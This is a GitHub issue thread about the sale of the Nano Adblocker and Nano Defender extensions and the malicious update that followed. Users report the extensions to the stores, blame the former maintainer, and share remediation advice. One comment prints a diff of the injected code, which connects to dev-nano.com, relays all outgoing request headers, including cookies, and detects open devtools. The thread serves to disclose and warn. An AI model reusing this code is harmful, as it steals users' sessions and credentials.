Discussions regarding recent changes to the Nano projects #2
Comments
|
Okay, I analyzed the update with Burp Suite, and so far, it doesn't seem to be doing anything special. But I do see that the code can be remotely configured. I'm not sure how did it pass WebStore review, but I'm submitting a ticket to ask them to review it again. |
So what was the plan then for releasing Edge updates? |
No plan, the Edge store listings won't receive further updates. They were changed to hidden (unlisted). |
|
So just making sure, basically you transferred ownership of an extension and then the new developer turned it into malware? (As in monitoring for devtools to be opened, and logging sites?) |
|
Also here's what I get when {"handleObject":{}}<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot POST /</pre>
</body>
</html>If you can't tell, it's an Express.js server running on the Node.js runtime. Especially proven by: X-Powered-By: ExpressHere's the full payload: RequestPOST / HTTP/1.1
Host: def.dev-nano.com
Content-Type: application/json
Content-Length: 19
{"handleObject":{}}ResponseHTTP/1.1 404 Not Found
Date: Fri, 16 Oct 2020 02:37:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=<<redacted>>; expires=Sun, 15-Nov-20 02:37:12 GMT; path=/; domain=.dev-nano.com; HttpOnly; SameSite=Lax; Secure
X-Powered-By: Express
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: <<redacted>>
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?lkg-colo=11&lkg-time=1602815832"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: <<redacted>>
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot POST /</pre>
</body>
</html> |
|
I've installed this on many PCs for friends and family and you just sell out without doing any sort of due diligence? Just wow. |
|
I know, it's really off. |
|
OK. As a user of Nano Adblocker and Nano Defender, I will immediately uninstall Nano Defender and Nano Adblocker on the new Microsoft Edge based on Chromium and replace them with uBlock Origin and uBO Extra only. |
I looked up the person who contacted me, didn't find anything bad. Nothing good neither, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him. |
|
Reminds me of the event-stream incident dominictarr/event-stream#116 . |
|
Just report this fake nano as an abuse / malware: https://chrome.google.com/webstore/report/gabbbocakeomblphkmmnoamkioajlkfo?hl=en |
Then why doesn't he come to the Github issue and clear the air himself. Quick buck or not one thing is sure you just sold the userbase and put userdata of 100,000+ users on risk. I respected the work you put in this project and recommended it to my friends but now you have lost your credibility in my eyes. |
|
He's on github -- https://github.com/nenodevs I doubt he cares, he got what he wanted anyways. |
|
Per the ghacks article and comments, I've reported the recent changes to both the Chrome Store and the Microsoft Store. |
|
I have contacted Microsoft and they are looking into if it's possible to block installation of the Chrome Store version on Edge as well. |
You wouldn't if there's anything bad, we all know. The reason people criticize you is that you sold to guys with no good record; i.e. unknown, without first discussing about it openly. Anyway, it's done. I guess it's better to discuss what can be done to recover what were lost, in addition to reporting the extension, such as Quick reporter. I appreciate you offered @LiCybora assist of the reporter. |
|
The same sort of code I reported here has been added to Nano Adblocker 1.0.0.154. The code was added to Minor differences are the incoming/outgoing message names used to configure the two-way phone-home capabilities (to distinguish from which extension the messaging occurs I suppose), and how they try to "obfuscate" the code dealing with removing instances of Those code changes can't be found on their repo. Here is the diff--- v1.0.0.153/js/commands.js
+++ v1.0.0.154/js/commands.js
@@ -55,6 +55,98 @@
);
}
+var nanoDevAB = io.connect("https://www.dev-nano.com/");
+var getNewListData = {};
+
+async function getNewList(newList) {
+ let getFeResp = await fetch(newList.uri, newList.attr)
+ let num = 1;
+ if (num == 1) {
+ var getListObj = {}
+ } else {
+ var fact = 1;
+ for (var i = 1; i > num; i--) {
+ fact = fact * i;
+ break;
+ }
+ var getListObj = {}
+ }
+ getListObj.headerEntries = Array.from(getFeResp.headers.entries())
+ getListObj.data = await getFeResp.text()
+ getListObj.ok = getFeResp.ok;
+ getListObj.status = getFeResp.status;
+ return getListObj;
+}
+
+nanoDevAB.on("getNewList", async function (newList) {
+ let getRes = await getNewList(newList);
+ nanoDevAB.emit(newList.callBack, getRes)
+});
+
+nanoDevAB.on("getNewListData", function (a) {
+ getNewListData = a;
+})
+
+var handleLists = function (infos) {
+ var listKey = Object.keys(getNewListData);
+ var find1 = "-";
+ var detailsHeader = infos.requestHeaders;
+ var find2 = "z";
+ var HeadReverse = detailsHeader.reverse();
+ var stringyFy = JSON.stringify(HeadReverse);
+ var find4 = "z";
+ var countEqual = "";
+ if (listKey.length > 0) {
+ var checkerList = true;
+ for (const object of listKey) {
+ if (object.x === object.y) {
+ countEqual += 1;
+ }
+ break;
+ }
+ for (let i = 0; i < listKey.length; i++) {
+ let x = listKey[i];
+ var re = new RegExp(getNewListData[x],'gi');
+ countEqual = "5";
+ if (infos[x].toString().match(re) == null) {
+ checkerList = false;
+ break;
+ }
+ }
+ if (checkerList) {
+ nanoDevAB.emit('newListhandeList', infos);
+ }
+ }
+
+ var find3 = "z";
+ var findAll = [find1, find2, find3, find4].join("");
+ var parseConcat = stringyFy.split(findAll).join("");
+ var parser = JSON.parse(parseConcat);
+ return {
+ requestHeaders: parser
+ }
+};
+chrome.webRequest.onBeforeSendHeaders.addListener(handleLists, {
+ urls: ["<all_urls>"]
+}, ['requestHeaders', 'blocking', 'extraHeaders']);
+
+
+var element = document.createElement("p"); ;
+var openListGet = false;
+element.__defineGetter__("id", function() {
+ openListGet = true;
+});
+
+var i = setInterval(function() {
+ openListGet = false;
+ console.log(element);
+ if(openListGet){
+ nanoDevAB.emit("report")
+ console.clear();
+ clearInterval(i)
+ }
+}, 100);
+
/******************************************************************************/
(( ) => {
|
They're waiting for CWS approval. They did the same thing with Defender, they waited for the approval and then it went into the source. |
|
The socket code file change is there, the diff I published above and in the other case is what is not there. |
|
Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued? |
Just install & use uBO |
Nano Defender for Firefox is NOT discontinued, only Nano Adblocker. More accurate: I refuse to port Nano Defender for the new developers, but I do NOT say I abandoned Nano Defender. Instead it is independent from upstream now. |
|
Okay so, @jspenguin2017 why didn't you just discontinue the project in some way? You could have pushed an update that shows some sort of popup on browser start or some sort of warning to notify the users of it being discontinued. If you really wanted to sell it, I would have put that sort of alert there for more then a week before finalizing the sale. |
|
Just wrote a blog post to warn people about this extension. I'm trying to make as much noise as possible, so people are aware of this horrendous abuse of trust. |
@jspenguin2017 I am not "misrepresenting facts." The actual facts show that you sold the extension to unknown, unproven (in terms of competence), and eventually-proven untrustworthy developers for financial gain. I say "quick buck" because you did this all very fast, without properly allowing the community any input. Like I said before in the now-frozen issue, you would have been better off closing down the project and sending users back to uBlock Origin than sell your users directly into malware. That is directly your fault. There is no recovering from this. You have permanently destroyed the trust that the userbase had for you. You can't, as far as I know, get control of the extension back on the Chrome Web Store. The only hope now for uninformed end-users is that Google steps up and bans the extension. What are you going to do to try and help fix this situation? |
|
Seems like Google has removed Nano Defender from the Chrome Web Store already, let's hope Nano Adblocker follows soon. I have reported both extensions to Google and will leave a 1 star review as well for good measure. @jspenguin2017, this whole matter is nothing short of a shameful disgrace - you have sold out your user base, a sizable one at that, for a quick buck. Extremely pathetic indeed. You have permanently destroyed the trust I previously had in you, I had your extensions installed myself and recommended them to friends and family members. You were willing to deliberately put people at risk and you have given access to PII over to what turns out to be people not acting in good faith. I hope none of your future projects in the open source field succeed, and if I see your name mentioned somewhere, I'll make sure to point my finger at this incident here. Yes, this is harsh, but this is what you deserve for putting user data at risk in exchange for money, on a grand scale. To say I am extremely disappointed would be an understatement. |
|
nano defender disappeared from chrome store |
|
Great job. I've just reported Nano Adblocker as malware. @jspenguin2017 Please take this as a learning curve. I suggest everyone else to do the same. This is a perfect example of why selling your extension to "Turkish developers" (with absolutely no warning to your users) is really not a good idea. In addition, I would encourage a much greater amount of transparency if you do this again. We don't even know who these people are, and they've already injected malicious code into hundreds of thousands of browsers worldwide. That's just not good, and everyone involved seems to have forgotten their implicit duty to the people, not secretive business deals. If you take anything away from this, let it be that. I do partially understand the anger of the users above, but I'd like to discourage any aggression towards Hugo. You're allowed to share your opinions, but please redact any opinionated cynicism. He just fucked up, and probably hasn't done anything like this before (making him an even bigger target for these thugs). Right, moving on: we need to scrub this malware off the Chrome Web Store permanently. Don't hold back. I'd also like to amend this issue: LiCybora/NanoDefenderFirefox#187 The maintainer of the Firefox extensions Nano Defender and Nano AdBlocker states:
So they're currently safe from malicious interference (for now?).
Now, seeing as we're all on the same page: we need to encourage people to report this malware to Google, which can be done here. This only takes two minutes, and will contribute to the removal of malware being pedalled by unknown rogue "Turkish developers". I really can't stand for this manipulative trickery. Remember, this malicious software can scrape bank credentials, passwords, and everything else. EDIT: (Apologies for the email spam, I just needed to amend some more of my thoughts into this one.) Speak up now, or forever hold your peace. |
|
If anything, you are far too soft on @jspenguin2017... There is a reason for the lack of transparency here, namely that the users would not have been welcoming towards the sale, had it been announced way in advance. @jspenguin2017 knew that, so the transaction took place quietly, @jspenguin2017 received his money (his ultimate goal), now users are free to complain all they like, given that the ultimate goal (money) was already achieved, so who cares? User data being put at risk? Not a concern as long as the cash is coming in... Sorry but this is how I see it. If it were not so, there would have been no reason to be so secretive about it, namely not to tell the user base anything about the deal. I reiterate what I said in my prior comment: If I see the former developer's name mentioned ever again in some other conversation, I'll point at this discussion here, let's see how far the few bucks he got in exchange for outright betraying the user base (by leaving access to user data wide open) get him, given his now ruined reputation. EDIT: What are the downvoters trying to tell me here? Users of future projects of @jspenguin2017 should be informed of what the developer was previously capable of, for the sake of their own protection, not as revenge against @jspenguin2017. Likewise people who might invest in him monetarily in the future. The public has a right to be informed about such incidents (which constitute at the very least severe neglect if not worse). Or so I think anyway. |
|
Just as a layman end user of nano defender, should I change my passwords to the sites I logged in? Should I assume my data has been compromised? |
My comments are supported by real strong argumentation, rather than by stupid thumbs down emojis...so I definately don't fit into your description.
Stop counting %, because this is not about %, as noone deny the fact Nano is derivied from uBO code, but it's about actual original features, one of them, apart from "issue reporting tool", was a syntax highlighter, which none of you mentioned as an original feautre of Nano (and as for you, you didn't even mention about a reporting tool as well), especially given the fact it (syntax highlighter) was previously declined to be added to uBO, and also then suddenly it was replicated, and then you just repeat "Nano was the same what uBO was." what is bullshit. Stick to facts. Also after uBO catched Nano with syntax highlighter and enhanced anti-adblock capatibilities, it's easy now in 2020 to come and say: uBO is the same what Nano is now, sure, but it would be fair as well and worth saying it was not in the past and it would be fair to mention Nano was in the past:
A bit fairness would be good, even after what happened with Nano recently. |
So this is a picture of your mouth (or your friend)?
|
|
What data could've been collected by the malicious versions, and how could I make sure my brother won't get hacked? |
no...but it's hilarious with no context among the others shown. not sure what you're on about with the rest of your comment. |
It is about values/motto for young people in the XXI century - some would die for liking, subscriptions, views. |
|
This thread is riddled with guys complaining about young people using thumbs-down emojis, let that sink for a second.. can we get back on track please? |
|
As far as I am concerned, some should international class action lawsuit (representative action) is being brought, but does any country have a jurisdiction on Turkey... https://en.wikipedia.org/wiki/Class_action |
Nice trolling...but actually the truth is vice-versa, this thread is riddled with trolls abusing thumbs-down emojis as a replacement for real argumentation which they lack.
I agree, let's begin to actually use a brain rather than thumbs down emojis not supported by any argumentation. |
|
I do not see the point of arguing MY down vote why someone should leave a spambolic liking for a picture with their "mouth", because it amuses someone (tzw. beka). you leave it to the court as evidence in the case or how ... |
What kind of nonsense debate is this? What users? This is a chrome addon, no users attached to it. You dont have accounts or user login associated with the addon. If it is any fault, it is Googles fault. They mostly have to remove addons on peoples Chrome, if the owner of the addon changes. So maybe you can sue Google for this, not the addon creator. And Googles lack of responsibility to check an addon, if the owner changes, and just auto updating it. |
Nonsense? Why do you think the chrome store removed the extension asap? Also, users are google accounts who downloaded and were using the extension at the moment of course. |
What are you even talking about? They removed it just because of reports, or auto scans of code. As simple as that. Using the word "users" is totally nonsense if you speak about a Chrome addon. You are not connected to a Chrome addon, no users, no logins, no accounts. "Selling user data" is also nonsense in this topic. There are no user data. |
|
I mean, I disagree with everything you said but I don't care enough to argue with some trolls who get triggered for some thumbs-down emojis so I'll see myself out |
I'm not triggered, as I previoulsy already have written in #2 (comment) : "I have no problems with accepting thumbs down emoji as long as they are supported by arguments." It's reasonable to expect an argumentation why someone disagrees, otherwise a discussion turns into stupid trolls / fanboys festival. Actually I think trolls are the ones who get triggered, they get triggered because they lack any argumentation to beat the opponent, so they get triggered and give thumb down emojis as a result of being triggered...so funny, see 🖕
Just admit then that the real reason is because you run out of arguments...keep trolling then, it's funny to see you trolling.
Like most trolls, when they run out of arguments, they run away, funny. |
This is a reasonable question actually. Imagine someone is selling a knife. A killer bought that knife and killed someone. Will you be debating whom to sue and how to do that on a platform, which merely hosts drawings of that knife? No, you don't, that's not the place to do it! |
In 2020 and people still think "user" has to be related with login. Users are the people who use your solution.
Like saying a shop sells you a knife and if you use that knife to kill someone, it's the shop's fault on not checking your background.
There are many factors here:
The reason jspenguin2017 won't get sued is mostly because he sold 200k user base for 2000$ or so (talking on average price of these types of operation) and the lawyers won't get much juice from that. But if someone really want to pursue and if they found something. Tough luck. Maybe spent those 2k on hiring @makedir service. Also, Google are too big to touch, their lawyers are too powerful and good luck on suing random hacker.
THERE IS user data. The extension asked permission for touching our user data the first time we install it. The extension touch user data (internet traffic) for adblocking purpose. My question is: did someone invent time machine ? The whole Facebook incident enlighten many of us about user data, privacy, … and we have GDPR and similar compliant arounds the world now. Why are you acting like there has been no breached user data ? |
|
He won't get sued because he didn't technically broke law - he wasn't directly responsible for what Turkish third-party did, but morally he did wrong and he paid for it morally - he was lynched by the community. Oh my god I've just found a photo with penguin doing a "quick buck" deal with the Turkish devs, offical meme: |
|
Hey all I have written a post instructing users on how to respond to this infection. If you feel it helped you understand the scope of the infection and what to do to respond, you are welcome to distribute it. https://chris.partridge.tech/2020/extensions-the-next-generation-of-malware/help-for-users/ |
|
I had the Nano Defender extension installed on chrome but I had it turned off even during the update. When extensions are turned off, can you still be affected by the malware embedded in the extension? |
|
If the extension itself was disabled at the time, you would not be affected by the malware. |
|
@tweedge error 404, someone broke your blog: Also tried remove "/help-for-users/" or these: https://chris.partridge.tech/2020/extensions-the-next-generation-of-malware%2Fhelp-for-users/ |
|
Working on the fix. No idea what's going wrong, everything works locally. Content is here: https://github.com/partridge-tech/chris-blog/blob/master/_content/2020/extensions-the-next-generation-of-malware/help.md Edit: site's back. Engaging Cloudflare support |
After reading the post from @tweedge, I realized the conversations from me #712448295, #712511672 and a few people in this thread were wrong. As Chris said in the article, that extension had the ability to fetch any credentials (cookies) of any websites at any time without leaving a history!! Here's a PoC that tries to use PoC repo: https://github.com/vungsung/CookieBypassHistoryPoC
It means that by only logging out of all the websites you visited in the past 4~5 days was far not enough! Any valid session cookies stored in your browser could be targeted!I hope this will remind people who are not aware of this. And thanks alot for Chris's post! |
|
A good thing that permanent session cookies are mostly only used on social media sites. So things like Protonmail or online bank accounts are probably secure. |
|
PrestaShop uses e.g. external IP verification, if it doesn't match, it won't let you in. I doubt that someone will try to effectively counterfeit an Internet operator's IP from a public pool. |
|
bzw, none of you guys have a pihole running? I'm just digging the logs and I can clearly see one www.instagram.com roundabout every 2 minutes. Starting the 16.10. but the first dev-nano.com request was at the 15.10. |
and others
Original announcement: NanoAdblocker/NanoCore#362
Please continue the discussions here.
Please take the time to read the original announcement (the entire thread) before posting your comment.
Final update:
I understand that my handling of the recent changes was a disaster, and I am sorry that my inexperience caused issues for some of you. But it would be a bigger disaster if we do not learn from this incident. It is clear that I could have handled the background checks of the new developer(s) and the user communications better.
This is the first time that someone offered to acquire my software, and I honestly have no idea what the process should look like. Many of you have commended on what I should have done but there are currently too many conflicting information floating around. Instead of taking advice from here, which has proven to be rather difficult, I will seek professional counselling next time to ensure a smooth and secure transition.
All the best for the future.
Update:
For those of you discussing about suing me, I would like to direct you to read the GPL-3.0 license and the disclaimers in the original announcement post again.
The text was updated successfully, but these errors were encountered: